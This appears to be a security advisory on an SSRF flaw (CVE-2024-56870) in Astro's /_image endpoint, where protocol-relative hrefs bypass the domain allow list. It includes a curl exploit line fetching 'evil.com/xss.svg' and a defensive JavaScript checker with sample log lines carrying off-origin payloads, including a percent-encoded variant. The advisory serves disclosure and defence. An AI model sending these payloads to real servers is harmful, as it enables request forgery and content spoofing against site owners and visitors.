Astro, Server-Side Request Forgery (SSRF), CVE-2024-56870 (Medium)


The vulnerability exists within the `/_image` endpoint of Astro's on-demand rendering. This endpoint uses the `href` query parameter to fetch images. Normally, it validates the target URL against an allow list of authorized domains (configured via `image.domains` or `image.remotePatterns`). The flaw lies in improper parsing and validation of protocol-relative URLs (e.g., `//example.com/image.png`): the validation logic fails to recognize the host in such a URL and treats it as a local path rather than an absolute URL to an external domain. This parsing error lets an attacker bypass the domain allow list entirely. Consequently, the server's image optimization service makes a server-side request to whatever domain is named in the manipulated `href` parameter, then fetches and serves the content from that unauthorized source.
Platform: Astro
Version: <5.13.1
Vulnerability: SSRF
Severity: Medium

Date: 2024-12-19

Prediction: Patch expected 2024-12-20

What Undercode Say:

`curl "http://localhost:4321/_image?href=//evil.com/xss.svg"`

The `/_image` endpoint is served at request time only when the site uses on-demand rendering, which requires an adapter. The affected setup looks like this (`astro.config.mjs`; the `@astrojs/node` import and `export default` wrapper are added to make the fragment a complete config):

```js
import { defineConfig } from 'astro/config';
import node from '@astrojs/node';

// On-demand rendering via the Node adapter: the /_image endpoint
// fetches and optimizes images at request time under this configuration.
export default defineConfig({
  adapter: node({ mode: 'standalone' }),
});
```

How Exploit:

A malicious actor crafts a URL with a `//` prefix in `href` to bypass the domain checks. The server fetches the external image and serves it from the victim's domain, enabling phishing and content spoofing.

Protection from this CVE:

Upgrade to astro>=5.13.1. Implement strict WAF rules rejecting a double slash in the `href` parameter. Avoid using `image.domains` if possible.
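The following is an added example, not Astro's code and not part of the advisory. It shows, side by side, a naive allow-list check of the kind described above (a stand-in written for illustration, not Astro's actual implementation) that treats a protocol-relative `href` as a local path, and a hardened check that resolves every `href` against the site's own origin before comparing hosts. The same hardened check is then run over constructed access-log lines to flag `/_image` requests that would have fetched from an off-origin host, including a percent-encoded variant that a WAF rule matching the literal string `//` would miss. The allow list, site origin and log lines are constructed sample values.

```javascript
// Added example (not Astro's code): classify the href an /_image request
// would fetch, and scan constructed access-log lines for off-origin fetches.
// Allow list, origin and log lines below are constructed sample values.

const ALLOWED_DOMAINS = ['images.example.com'];
const SITE_ORIGIN = 'http://localhost:4321';

// Naive check of the kind the advisory describes (illustrative stand-in):
// anything without an explicit scheme is treated as a local path and skips
// the domain check, so "//evil.com/x" passes although it resolves off-site.
function isAllowedNaive(href) {
  if (!/^https?:\/\//i.test(href)) return true; // assumed local: the flaw
  return ALLOWED_DOMAINS.includes(new URL(href).hostname);
}

// Hardened check: resolve every href against the site's own origin so that
// protocol-relative and absolute URLs are parsed the same way, then allow
// only same-origin results or hosts on the allow list.
function isAllowedHardened(href, siteOrigin = SITE_ORIGIN) {
  let url;
  try {
    url = new URL(href, siteOrigin);
  } catch {
    return false; // unparseable input is rejected, not assumed local
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return false;
  if (url.origin === new URL(siteOrigin).origin) return true; // local asset
  return ALLOWED_DOMAINS.includes(url.hostname);
}

// Constructed access-log lines (Common Log Format). The third line carries the
// same href as the second but percent-encoded, which a WAF rule looking for a
// literal "//" in the request would not catch.
const SAMPLE_LOG = [
  '10.0.0.5 - - [19/Dec/2024:10:01:02 +0000] "GET /_image?href=%2Fimages%2Flogo.png&w=300&f=webp HTTP/1.1" 200 1234',
  '10.0.0.9 - - [19/Dec/2024:10:01:05 +0000] "GET /_image?href=//evil.example/xss.svg&w=300 HTTP/1.1" 200 4321',
  '10.0.0.9 - - [19/Dec/2024:10:01:07 +0000] "GET /_image?href=%2F%2Fevil.example%2Fxss.svg HTTP/1.1" 200 4321',
  '10.0.0.7 - - [19/Dec/2024:10:01:09 +0000] "GET /about HTTP/1.1" 200 99',
];

// Return the hrefs (and resolved hosts) of /_image requests in the log that
// the hardened check would reject, i.e. fetches that left the site's origin
// for a host outside the allow list.
function findOffOriginImageFetches(lines, siteOrigin = SITE_ORIGIN) {
  const hits = [];
  for (const line of lines) {
    const m = line.match(/"(?:GET|HEAD) (\S+) HTTP/);
    if (!m) continue;
    let request;
    try {
      request = new URL(m[1], siteOrigin);
    } catch {
      continue;
    }
    if (request.pathname !== '/_image') continue;
    const href = request.searchParams.get('href'); // decodes %2F%2F to //
    if (href === null) continue;
    if (!isAllowedHardened(href, siteOrigin)) {
      let host = null;
      try {
        host = new URL(href, siteOrigin).hostname;
      } catch {}
      hits.push({ href, host });
    }
  }
  return hits;
}

console.log(findOffOriginImageFetches(SAMPLE_LOG));
```

The log scan decodes the query string before classifying the `href`, so it sees the encoded and unencoded forms identically; a pattern-only WAF rule should likewise be applied after URL decoding, and a fix at the validation layer (resolving against the site origin, as in `isAllowedHardened`) is the more reliable control.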

Impact:

Unauthorized image content served from trusted domain. Potential for XSS if SVG with malicious scripts is fetched and rendered. Reputational damage due to content spoofing.


Sources:

Reported By: github.com
